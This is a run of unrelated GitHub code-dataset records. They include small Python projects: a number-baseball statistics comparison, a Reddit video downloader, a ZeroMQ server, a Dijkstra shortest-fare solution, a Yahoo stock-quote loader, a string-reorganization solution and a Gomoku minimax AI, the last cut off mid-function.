OrientationWhistleblowerPageMap['OrientationPayLeaveLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationBenefitsLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationWorkersCompLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationEthicsLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationWhistleblowerLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationHrConnectLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationForgottenLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationConstitutionLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationAbbreviationsLinkXpath']\n )\n except: \n raise IncorrectPageException\n \n \n \n ","repo_name":"vleung1/portfolio","sub_path":"Vincent_Leung_Portfolio_2016/test-automation/oig/pages/OrientationWhistleblowerPage.py","file_name":"OrientationWhistleblowerPage.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6497048366","text":"import AutoNumberBaseball\nimport AutoNumberBaseballVer1\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\nimport pandas as pd\nimport numpy as np\n\n\n# 프로그램을 시작, 종료하는 funciton이 존재해야 함. 종료 function에는 모든 초기값들이 초기화되어야 한다. 
시작 function은 컴퓨터의 시도 횟수와 guess 추이를 반환해야 한다.\ndef auto_execute(start_func, end_func, repeat):\n list_of_guess_log = []\n\n list_of_attempts = []\n for i in range(repeat):\n attempts, guess_log = start_func()\n list_of_attempts.append(attempts)\n while len(guess_log) != 14:\n guess_log.append(0)\n list_of_guess_log.append(guess_log)\n end_func()\n print(\"%d번째 게임 끝\" % (i+1))\n attempts = pd.DataFrame(list_of_attempts, columns=['attempt'])\n total_guess = pd.DataFrame(list_of_guess_log, columns=['0회', '1회', '2회', '3회', '4회', '5회', '6회', '7회', '8회', '9회', '10회', '11회', '12회', '13회'])\n total_guess.loc['Avrg.'] = total_guess.mean()\n\n return attempts, total_guess\n\n\nVer0_attempts, Ver0_total_guess = auto_execute(AutoNumberBaseball.ProgramStart, AutoNumberBaseball.ProgramEnd, 10000)\nVer1_attempts, Ver1_total_guess = auto_execute(AutoNumberBaseballVer1.ProgramStart, AutoNumberBaseballVer1.ProgramEnd, 10000)\n\nprint(\"-\"*100)\nprint(\"\\n\\nVer0의 평균 시도 횟수: %.4f\\nVer1의 평균 시도 횟수: %.4f\" % (np.mean(Ver0_attempts.attempt), np.mean(Ver1_attempts.attempt)))\n\nlresult = stats.levene(Ver0_attempts.attempt, Ver1_attempts.attempt)\nprint('\\n<유의수준 0.05>\\n등분산 검정 결과(F값) : %.4f \\np-value : %.4f' % (lresult))\n\n\ntresult = stats.ttest_ind(Ver0_attempts, Ver1_attempts, equal_var=True)\nprint('\\n\\n<유의수준 0.05>\\n독립표본 등분산 t검정 결과(t값) : %.8f \\np-value : %.8f' % (tresult))\n\ntresult2 = stats.ttest_ind(Ver0_attempts, Ver1_attempts, equal_var=False)\nprint('\\n\\n<유의수준 0.05>\\n독립표본 이분산 t검정 결과(t값) : %.8f \\np-value : %.8f' % (tresult2))\n\n # plt.plot([0,1,2,3,4,5,6,7,8,9], list_of_guess_log[0])\n # plt.xlabel('Attempts')\n # plt.ylabel('Possible Answer')\n # plt.title('Possible Answer Log of Ver 0')\n # plt.savefig('/workspace/Number_Baseball/UpgradeProcess/Ver_0')\nprint(\"\\n\")\nprint(Ver0_total_guess.loc['Avrg.'])\nprint(\"\\n\")\nprint(Ver1_total_guess.loc['Avrg.'])\nprint(\"\\n\")\nplt.plot([0,1,2,3,4,5,6,7,8,9,10,11,12,13], Ver0_total_guess.loc['Avrg.'].tolist(), color='b', label='Ver0')\nplt.plot([0,1,2,3,4,5,6,7,8,9,10,11,12,13], Ver1_total_guess.loc['Avrg.'].tolist(), color='r', label='Ver1')\nplt.xlabel('Attempts')\nplt.ylabel('Answers')\nplt.title('Ver0 and 1 Average Number of Answers: 10,000 repetitions each')\nplt.grid()\nplt.legend()\n\nplt.savefig('/workspace/Number_Baseball/UpgradeProcess/Ver_0_1_Guess_Log')","repo_name":"shyoon515/Number_Baseball","sub_path":"UpgradeProcess/Ver0_vs_Ver1/CompareVer0andVer1.py","file_name":"CompareVer0andVer1.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69883886275","text":"import requests\nimport os\nimport json\n\ndef clean_videos_folder():\n os.system(\"rm videos/*\")\n\ndef download_videos():\n URL = \"https://www.reddit.com/r/oddlysatisfying/top.json?sort=top&t=day&limit=10\"\n res = requests.get(URL, headers={'User-agent': 'reddit scrapper'})\n json_res = res.json()\n manifest_json = {\"data\": []}\n\n for idx in range(10):\n try:\n submission_data = json_res['data']['children'][idx]['data']\n if submission_data['is_video'] == False:\n continue\n if submission_data['secure_media'] == None:\n continue\n if submission_data['secure_media']['reddit_video'] == None:\n continue\n if submission_data['secure_media']['reddit_video']['fallback_url'] == None:\n continue\n if submission_data['secure_media']['reddit_video']['duration'] == None:\n continue\n\n fallback_url = submission_data['secure_media']['reddit_video']['fallback_url']\n title = 
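The comparison script above runs Levene's test and then both the equal-variance and Welch t-tests; the usual practice is to let Levene's p-value pick the t-test variant. A small helper sketching that decision (toy data, alpha = 0.05 assumed):

import numpy as np
from scipy import stats

def compare_means(a, b, alpha=0.05):
    # Student's t only when Levene cannot reject equal variances,
    # otherwise Welch's t (equal_var=False).
    _, p_levene = stats.levene(a, b)
    equal_var = p_levene >= alpha
    return stats.ttest_ind(a, b, equal_var=equal_var)

rng = np.random.default_rng(0)
print(compare_means(rng.normal(5, 1, 100), rng.normal(5.3, 2, 100)))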
submission_data['title']\n\n r = requests.get(fallback_url, stream=True)\n formatted_title = title.replace(' ', '_').replace('(', '').replace(')', '').lower()\n with open(f\"videos/{formatted_title}.mp4\", 'wb') as f:\n for chunk in r.iter_content(chunk_size = 1024*1024):\n if chunk:\n f.write(chunk)\n\n filename = f\"{formatted_title}.mp4\"\n new_file_name = f\"output.{filename}\"\n os.system(f\"ffmpeg -i videos/{filename} videos/{new_file_name}\")\n os.system(f\"rm videos/{filename}\")\n\n manifest_json[\"data\"].append({\n \"filename\": filename,\n \"title\": title,\n })\n except Exception as e:\n print(idx)\n\n with open(\"videos/manifest.json\", \"w\") as f:\n json.dump(manifest_json, f)\n\ndef main():\n clean_videos_folder()\n download_videos()\n\nif __name__ == '__main__':\n main()","repo_name":"RobinChailley/reddit-twitter-auto-publisher","sub_path":"download_videos.py","file_name":"download_videos.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30532946188","text":"# Example based on \n# https://zeromq.org/languages/python/\n\nimport time\nimport zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind('tcp://*:5555')\n\nwhile True:\n\n try:\n \n message = socket.recv()\n print('Received request:', message)\n\n number = float(message)\n response = b'ok' if number < 70 else b'high'\n\n time.sleep(1)\n\n socket.send(response)\n\n except KeyboardInterrupt:\n print('\\nStopping the server due to keyborard interrupt')\n break\n","repo_name":"semeniuta/ntnu-faai","sub_path":"communication/zmq_server.py","file_name":"zmq_server.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23604041491","text":"\r\nfilename = 'B-large'\r\n\r\ndef gcd(a, b):\r\n if a > b: a, b = b, a\r\n while a != 0:\r\n a, b = b % a, a\r\n return b\r\n\r\nfin = open(filename + '.in')\r\nfout = open(filename + '.out', 'w')\r\ncases = int(fin.readline().strip())\r\nfor case in xrange(1, cases + 1):\r\n t = [int(x) for x in fin.readline().strip().split()]\r\n n = t.pop(0)\r\n t.sort()\r\n s = t[1] - t[0]\r\n for i in xrange(1, n - 1):\r\n s = gcd(s, t[i + 1] - t[i])\r\n ans = t[0] % s\r\n if ans != 0: ans = s - ans\r\n fout.write('Case #%d: %d\\n' % (case, ans))\r\nfin.close()\r\nfout.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_54/60.py","file_name":"60.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44290536860","text":"'''\n풀이 및 접근방법\n 1. 배열로 초기화하기 위해, 각각의 지점 s, a, b에 1씩을 뺀다.\n 2. 각각의 연결지점으로 된 fares를 순회하며, 각 지점에서 다른 지점과의 거리가 담긴 배열 graph를 세팅한다.\n 이 때, 직접적으로 연결되지 않으면 거리를 inf로 세팅한다.\n 3. 어느 지점에서 다른 지점으로 이동하는 최단 거리가 담긴 모든 배열을 min_graph에 담아야 한다.\n 이를 위해, 모든 지점을 순회하며 다익스트라 알고리즘을 이용해 최단거리를 구한다.\n 4. 모든 지점을 순회하며, s에서 해당 지점을 찍은 후 a, b로 각각 가는 거리의 합 중 최소값을 구해 리턴한다.\n\n 다익스트라\n 1. 자신에서 자신으로의 거리는 0, 나머지 지점과의 거리를 inf로 세팅해 dist에 저장한다.\n 2. 시작지점과 거리를 heapq를 이용해 q에 세팅한다.\n 3. heapq를 순회하며, 비용이 작은 노드를 먼저 선택한다.\n 4. 만약 선택된 노드의 거리값이 dist에 저장된 거리값보다 작을 때에 다음을 진행한다.\n 5. 해당 지점에서 다른 지점으로 가는 모든 거리값을 구해, 그 거리가 dist에 저장된 거리값보다 작으면 dist에 갱신한다.\n 6. 
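The zmq REP socket in the record above enforces a strict recv/send alternation, so its natural counterpart is a REQ client; a minimal one against the same (assumed local) port:

import zmq

context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect('tcp://localhost:5555')

for value in (42.0, 98.6):
    socket.send(str(value).encode())   # the server does float(message)
    print(value, '->', socket.recv())  # b'ok' below 70, b'high' otherwise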
다음 인접한 노드를 고려하기 위해 새로 구해진 거리값과 노드 인덱스를 q에 세팅한다.\n'''\n\n\nfrom math import inf\nfrom heapq import heappush, heappop\n\n\ndef dijkstra(n, graph, start):\n dist = [inf for _ in range(n)] # start 기준의 거리행렬\n dist[start] = 0 # 자기 자신으로 가는 간선은 0\n q = []\n heappush(q, [dist[start], start]) # 거리와 노드를 함께 큐에 삽입\n while q: # (비용이 작은 노드를 먼저 선택)\n cur_dist, cur_idx = heappop(q)\n if dist[cur_idx] >= cur_dist: # start에서 cur_dest로 가는 거리가\n for i in range(n): # 이미 저장된 거리보다 작을 때만 진행\n new_dist = cur_dist + graph[cur_idx][i]\n if new_dist < dist[i]: # cur_dest를 거쳐 i로 가는 거리가\n dist[i] = new_dist # 이미 저장된 거리보다 작으면 갱신\n heappush(q, [new_dist, i]) # 다음 인접한 노드를 고려하기 위해 큐에 삽입\n return dist\n\n\ndef solution(n, s, a, b, fares):\n s, a, b = s - 1, a - 1, b - 1 # 0부터 시작하는 인덱스\n graph = [[inf] * n for _ in range(n)]\n for fare in fares:\n u, v, w = fare\n graph[u - 1][v - 1] = graph[v - 1][u - 1] = w\n # 다익스트라\n # 모든 노드에 대해 다익스트라를 수행하고,\n # 반환된 1차원 거리행렬을 append 해줌\n min_graph = []\n for i in range(n):\n min_graph.append(dijkstra(n, graph, i))\n # 출발점을 기준으로 어떤 지점 k를 거쳐 각각 a와 b로 가는 최소 비용을 탐색\n ans = inf\n for k in range(n):\n ans = min(ans, min_graph[s][k] + min_graph[k][a] + min_graph[k][b])\n\n return ans","repo_name":"Slowth-KIM/crewcrew-coding-test-study","sub_path":"박한결/카카오기출문제/합승택시요금.py","file_name":"합승택시요금.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"8386792128","text":"import ystockquote\nimport sqlite3\nimport sys\nimport datetime\nimport urllib2\nimport Common\nimport time\nimport httplib\nimport string\nimport os\nimport socket\n\n\nsetting = {\n 'db' : 'us.db',\n 'stockfile' : 'nasdaq.csv,amex.csv,nyse.csv',\n}\n\n\ndef SwitchMarketCap(mc):\n c = mc[-1].upper()\n try:\n v = string.atof(mc[:-1])\n except:\n return 10*1000*1000*1000*1000\n \n if c=='K':\n v = v*1000\n if c=='M':\n v = v*1000*1000\n if c=='B':\n v = v*1000*1000*1000\n return v\n \n\ndef LoadStockList():\n stocks = []\n sfs = setting['stockfile'].split(',')\n for sf in sfs:\n f = open('data/'+sf)\n line = f.readline()\n while line:\n items = line.split(',')\n symbol = items[0].strip('\"')\n if (symbol.upper()!='SYMBOL') and (symbol.find('^')<0) and (symbol.find('/')<0):\n stocks.append(symbol)\n line = f.readline()\n f.close()\n \n return stocks\n \n \n\n \n\ndef LoadQuotaIntoDB(symbol, quota, dbcursor):\n for key in quota:\n data = quota[key]\n volume = string.atof(data[\"Volume\"])\n turnover = (string.atof(data[\"High\"]) + string.atof(data[\"Low\"]))/2 * volume\n data[\"Turnover\"] = str(turnover)\n open = string.atof(data[\"Open\"])\n close = string.atof(data[\"Close\"])\n #if (open == 0) or (turnover == 0):\n if (open == 0) or (volume == 0):\n data[\"Illiq\"] = \"0\"\n else:\n #data[\"Illiq\"] = str(abs(close-open)/open/turnover)\n data['Illiq'] = str(abs(close-open)/open/volume)\n\n sql = \"insert into quotation (id, date, open, close, adjclose, high, low, volume, turnover, illiq) values \"\n sql += \"('\"+setting[\"google\"]+symbol+\"','\"+key+\"',\"+data[\"Open\"]+\",\"+data[\"Close\"]+\",\"+data[\"Adj Close\"]+\",\"+data[\"High\"]+\",\"+data[\"Low\"]+\",\"+data[\"Volume\"]+\",\"+data[\"Turnover\"]+\",\"+data[\"Illiq\"]+\")\" \n dbcursor.execute(sql)\n realquota = ystockquote.get_all(symbol)\n mc = realquota['market_cap']\n try:\n pb = string.atof(realquota['price_book_ratio'])\n except:\n pb = 1000\n sql = 'update quotation set pb='+str(pb)+', currcapital_a='+str(SwitchMarketCap(mc))+' where id=\"' + symbol +'\"'\n 
dbcursor.execute(sql)\n \n return\n\n\ndef FetchQuotaFromYahoo(stocks):\n\n print(\"fetch data from yahoo for today\")\n \n total = str(len(stocks))\n count = 0\n nSuccess = 0\n nNodata = 0\n nFail = 0\n\n quotas = []\n for symbol in stocks:\n\n count += 1\n errmsg = str(count)+\"/\"+total+\" : \" + symbol\n nRetry = 12\n nTimeout = 10\n while True:\n try:\n print(errmsg)\n quota = ystockquote.get_all(symbol)\n if quota['last_trade_date'].upper() == 'N/A':\n print('fetch failed: data is N/A!')\n nFail += 1\n else:\n quota['last_trade_date'] = time.strftime('%Y-%m-%d', time.strptime(quota['last_trade_date'].strip('\"'), '%m/%d/%Y'))\n date = quota['last_trade_date']\n quota['extra'] = ystockquote.get_historical_prices(symbol, date, date)[date]\n nSuccess += 1\n quotas.append(quota)\n break\n except urllib2.HTTPError as httpe:\n print('fetch failed: '+str(httpe))\n nFail += 1\n break\n except urllib2.URLError as urle:\n print('fetch failed: '+str(urle))\n pass\n except socket.timeout as toe:\n print('fetch failed: '+str(toe))\n pass\n except socket.error as se:\n print('fetch failed: '+str(se))\n pass\n \n if nRetry == 0:\n nFail += 1\n break\n else:\n time.sleep(nTimeout)\n nRetry = nRetry - 1\n \n\n \n print(\"Fetch stocks, \"+str(nSuccess)+\" done, \"+str(nNodata)+\" no data found, \"+str(nFail)+\" failed.\")\n return quotas\n\ndef LoadQuotasIntoDB(quotas):\n db = sqlite3.connect(setting['db'])\n cu = db.cursor()\n \n try:\n trade_date = quotas[0]['last_trade_date']\n sql = 'delete from quota where date=\"'+trade_date+'\"'\n cu.execute(sql)\n \n for quota in quotas:\n close = string.atoi(quota['extra']['Close'])\n open = string.atoi(quota['extra']['Open'])\n turnover = string.atoi(quota['extra']['Volume'])\n illiq = abs(close-open)/open/turnover\n if quota['stock_exchange'].lower().index('nasdaq') >= 0:\n se = 'NASDAQ'\n if quota['stock_exchange'].lower().index('nasdaq') >= 0:\n se = 'NYSE'\n \n sql = 'insert into quota (id, date, open, close, adjclose, high, low, volume, turnover, illiq, pb, mcap, stock_exchange) values '\n sql += '('+quota['symbol']+',\"'+quota['last_trade_date']+'\",'+quota['extra']['Open']+','+quota['extra']['Close']+','+quota['extra']['Adj Close']+\",\"+quota['extra']['High']+\",\"+quota['extra']['Low']+','+quota['extra']['Volume']+','+quota['extra']['Volume']+','+str(illiq)+','+quota['price_book_ratio']+','+SwitchMarketCap(quota['market_cap'])+',\"'+se+'\")'\n cu.execute(sql)\n \n \n finally:\n cu.close()\n db.close()\n\ndef main():\n\n stocks = LoadStockList()\n quotas = FetchQuotaFromYahoo(stocks)\n LoadQuotasIntoDB(quotas)\n\n return\n\nmain()\n","repo_name":"szfree/illiq","sub_path":"fetch_us_quota.py","file_name":"fetch_us_quota.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28263952640","text":"# Given a string s, rearrange the characters of s so that any two adjacent characters are not the same.\n\n# Return any possible rearrangement of s or return \"\" if not possible.\n# Example 1:\n\n# Input: s = \"aab\"\n# Output: \"aba\"\n# Example 2:\n\n# Input: s = \"aaab\"\n# Output: \"\"\n\n# fastest solution\nfrom collections import Counter\nimport heapq\n\n\nclass Solution:\n def reorganizeString(self, s: str) -> str:\n heap = []\n for key, val in Counter(s).items():\n heapq.heappush(heap, (-val, key))\n res = \"\"\n while len(heap) > 1:\n freq1, char1 = heapq.heappop(heap)\n freq2, char2 = heapq.heappop(heap)\n res += char1 + char2\n if freq1 + 1 < 0:\n 
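FetchQuotaFromYahoo above hand-rolls a retry loop — up to 12 attempts with a fixed 10-second sleep — around transient network errors. The same policy as a reusable helper (a sketch; the transient-exception tuple is an assumption):

import time

def retry(fn, attempts=12, delay=10, transient=(OSError, IOError)):
    # Swallow transient errors until the attempt budget runs out.
    for attempt in range(attempts):
        try:
            return fn()
        except transient:
            if attempt == attempts - 1:
                raise
            time.sleep(delay)

print(retry(lambda: 42, attempts=3, delay=0))  # 42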
heapq.heappush(heap, (freq1 + 1, char1))\n if freq2 + 1 < 0:\n heapq.heappush(heap, (freq2 + 1, char2))\n if heap:\n freq, char = heapq.heappop(heap)\n if freq < -1:\n return \"\"\n else:\n res += char\n return res\n\n# implementation with priority queue\n# from queue import PriorityQueue\n# class Solution:\n# def reorganizeString(self, s: str) -> str: \n# res = \"\"\n# pq = PriorityQueue()\n# for key, val in Counter(s).items():\n# pq.put((-val,key))\n# while pq.qsize() > 1:\n# freq1,char1 = pq.get()\n# freq2,char2 = pq.get()\n# res += char1 + char2\n# if freq1 + 1 < 0:\n# pq.put((freq1 +1,char1))\n# if freq2 + 1 < 0:\n# pq.put((freq2 +1,char2))\n# if pq.qsize():\n# freq,char = pq.get()\n# if freq < -1:\n# return \"\"\n# else:\n# res += char\n# return res\n\n\nsd = Solution()\nprint(sd.reorganizeString(\"aab\"))\nprint(sd.reorganizeString(\"aaab\"))\nprint(sd.reorganizeString(\"vvvlo\"))\nprint(sd.reorganizeString(\"bfrbs\"))\nprint(sd.reorganizeString(\"ogccckcwmbmxtsbmozli\"))\n","repo_name":"yogeswarl/leetcode_problems","sub_path":"Reorganize_String.py","file_name":"Reorganize_String.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74523619395","text":"import time\r\nimport sys\r\nimport colored\r\nimport keyboard\r\n\r\n#印出棋盤,包括要特別標記的格子(以其橫排數chosenROWNUM和其直排數chosenPIECENUM表示)\r\ndef printBoard(board,width,chosenROWNUM=-1,chosenPIECENUM=-1):#若不須標記格子,則原本要特別標記的格子之座標預設為(-1,-1),程式就不會找到對應的格子特別標示了\r\n print(\"\\t\",end=\"\")\r\n for i in range(size):\r\n print(\" \"+str(i+1)+\" \",end=\" \"*(width-(len(str(i+1))-1)))#印出直排行數\r\n print(\"\\n\")#換兩行==print()print()\r\n #跑遍各排的各顆棋子\r\n for rowNum in range(size):\r\n print(str(rowNum+1),end=\"\\t\")#印出橫排行數\r\n for pieceNum in range(size):\r\n piece=board[rowNum][pieceNum]\r\n #針對玩家棋子、AI棋子、或空格,印出不同的前景色\r\n if piece==\"O\":\r\n THISfcolor=colored.fg(\"green\")\r\n elif piece==\"X\":\r\n THISfcolor=colored.fg(\"red_1\")\r\n elif piece==\".\":\r\n THISfcolor=fcolor\r\n #若該格是要特別標記的格子,則改變其背景色\r\n if rowNum==chosenROWNUM and pieceNum==chosenPIECENUM:\r\n THISbcolor=markedcolor\r\n else:\r\n THISbcolor=bcolor\r\n print(THISfcolor+THISbcolor+\" \"+piece+\" \"+reset,end=\"\")#印出一格棋子\r\n if not pieceNum==size-1: #不是最後一個棋子就再加上空白\r\n print(fcolor+bcolor+\" \" * width+reset,end=\"\")\r\n print()\r\n\r\n if not rowNum==size-1: #不是最後一排就再加上一行空白!\r\n print(\"\\t\"+fcolor+bcolor+\" \"*(width*(size-1)+size*(1+2))+reset)\r\n#設定難度,即AI的搜尋深度\r\n#0:搜尋深度淺,花費時間少;1:搜尋深度深,花費時間多\r\ndef setDifficulty():\r\n print(\"plz choose the difficulty.(0:AI's stupid while spending shorter time\\t/\\t1:AI's smart while spending more time)\")\r\n while True:\r\n a=input()\r\n try:\r\n a=int(a)\r\n except ValueError:\r\n print(\"not num!\")\r\n continue\r\n if a==0:\r\n return 6\r\n elif a==1:\r\n return 7\r\n else:\r\n print(\"plz enter 0 or 1.\")\r\n continue\r\n#設定棋盤大小\r\ndef setSize():\r\n print(\"plz enter the size of board.(n in size(nxn))(allowed size=5 to 20)\")\r\n while True:\r\n a=input()\r\n try:\r\n a=int(a)\r\n except ValueError:\r\n print(\"not num!\")\r\n continue\r\n if a>20:\r\n print(\"too BIG!!!\")\r\n continue\r\n elif a<5:\r\n print(\"too SMALL!!!\")\r\n continue\r\n return a\r\n#清空畫面(感謝徐晧倫)\r\ndef clear():\r\n print(\"\\n\"*100)\r\n#玩家下棋\r\ndef player():\r\n \r\n def getPlayerInput(x,y):#讓玩家調整要下棋的位置並等待按下enter\r\n while 1:\r\n print(\"plz choose ur pos.(Press the arrow keys to choose the position u like. 
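A rearrangement like the one above exists precisely when the most frequent character fits into every other slot, i.e. its count is at most (len(s) + 1) // 2 — the condition the final freq < -1 check guards. As a standalone predicate:

from collections import Counter

def can_reorganize(s: str) -> bool:
    # The most common letter must fit into every other slot.
    return max(Counter(s).values()) <= (len(s) + 1) // 2

print(can_reorganize("aab"), can_reorganize("aaab"))  # True False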
Then submit it by pressing enter.)\\n\\t\\t(press P should the board need reprinting.)\")\r\n while 1:#等待玩家按下按鍵\r\n if keyboard.is_pressed(77) and x+1=0: #if left arrow is pressed\r\n x-=1\r\n break\r\n if keyboard.is_pressed(72) and y-1>=0: #if up arrow is pressed\r\n y-=1\r\n break\r\n if keyboard.is_pressed(80) and y+1alpha and checkAplhaBeta:\r\n cut=True\r\n break\r\n elif who==\"playerAI\" and beta=checkDepth:#結束搜尋,傳回分數\r\n return pos\r\n else:\r\n return AllCheck(\"AI\",depth+1,aWholeNewBoard,checkDepth,onlyCheck,beta,checkAplhaBeta)\r\n elif who==\"AI\":\r\n if end or checkBoardFull(aWholeNewBoard) or depth+1>=checkDepth:#結束搜尋,傳回分數\r\n return pos\r\n else:\r\n return AllCheck(\"playerAI\",depth+1,aWholeNewBoard,checkDepth,onlyCheck,beta,checkAplhaBeta)\r\n\r\n#直排\r\ndef vertical(b,pos,who,depth,onlyCheck):\r\n for x in range(size):\r\n line = [b[y][x] for y in range(size)]\r\n piecePos=[(y,x) for y in range(size)]\r\n line = \"\".join(line)\r\n\r\n pos,end=analyze(line,b,piecePos,pos,who,depth,onlyCheck)\r\n return pos,end\r\n#橫排\r\ndef horizontal(b,pos,who,depth,onlyCheck):\r\n for y in range(size):\r\n line = [b[y][x] for x in range(size)]\r\n piecePos=[(y,x) for x in range(size)]\r\n line = \"\".join(line)\r\n\r\n pos,end=analyze(line,b,piecePos,pos,who,depth,onlyCheck)\r\n return pos,end\r\n#斜排\r\ndef slideUP(b,pos,who,depth,onlyCheck):\r\n for k in range(0+4,(size*2-1)-4):\r\n line = [b[y][x] for x in range(size) for y in range(size) if x+y==k]\r\n piecePos=[(y,x) for x in range(size) for y in range(size) if x+y==k]\r\n line = \"\".join(line)\r\n \r\n pos,end=analyze(line,b,piecePos,pos,who,depth,onlyCheck)\r\n return pos,end\r\n#斜排\r\ndef slideDOWN(b,pos,who,depth,onlyCheck):\r\n for k in range((-(size-1))+4,(size)-4):\r\n line = [b[y][x] for x in range(size) for y in range(size) if x-y==k]\r\n piecePos=[(y,x) for x in range(size) for y in range(size) if x-y==k]\r\n line = \"\".join(line)\r\n\r\n pos,end=analyze(line,b,piecePos,pos,who,depth,onlyCheck)\r\n return pos,end\r\n#分析情勢再加減分數\r\ndef analyze(line,b,piecePos,pos,who,depth,onlyCheck):\r\n #playerAI = O AI = X\r\n \r\n\r\n s,e=\"X\",\"O\"\r\n\r\n\r\n how=(1/10)**depth#越下層之分數越接近0,較不會影響總分\r\n checkend=False\r\n\r\n #判斷情勢\r\n if e*5 in line:\r\n if depth==0 and onlyCheck:\r\n gameover(\"win\")#玩家贏了\r\n pos-=10000000000 * how\r\n print(\"too bad\")\r\n checkend=True\r\n if e*4 in line:\r\n start=line.find(e*4)-1\r\n end=start+5\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" or endPiece==\".\":\r\n pos-=10000000 * how\r\n\r\n \r\n if e*3 in line:\r\n start=line.find(e*3)-1\r\n end=start+4\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=1000000 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos-=5000 * how\r\n\r\n \r\n if e*2 in line:\r\n start=line.find(e*2)-1\r\n end=start+3\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n 
if startPiece==\".\" and endPiece==\".\":\r\n pos-=100 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos-=50 * how\r\n\r\n \r\n if e*1 in line:\r\n start=line.find(e*1)-1\r\n end=start+2\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=3 * how\r\n elif startPiece==\".\":\r\n pos-=1 * how\r\n elif endPiece==\".\":\r\n pos-=1 * how\r\n\r\n\r\n\r\n if s*5 in line:\r\n if depth==0 and onlyCheck:\r\n gameover(\"lose\")#AI贏了\r\n pos+=10000000000 * how\r\n print(\"too good\")\r\n checkend=True\r\n if s*4 in line:\r\n start=line.find(s*4)-1\r\n end=start+5\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos+=10000000 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos+=5000 * how\r\n\r\n \r\n if s*3 in line:\r\n start=line.find(s*3)-1\r\n end=start+4\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos+=1000 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos+=10 * how\r\n\r\n \r\n if s*2 in line:\r\n start=line.find(s*2)-1\r\n end=start+3\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n 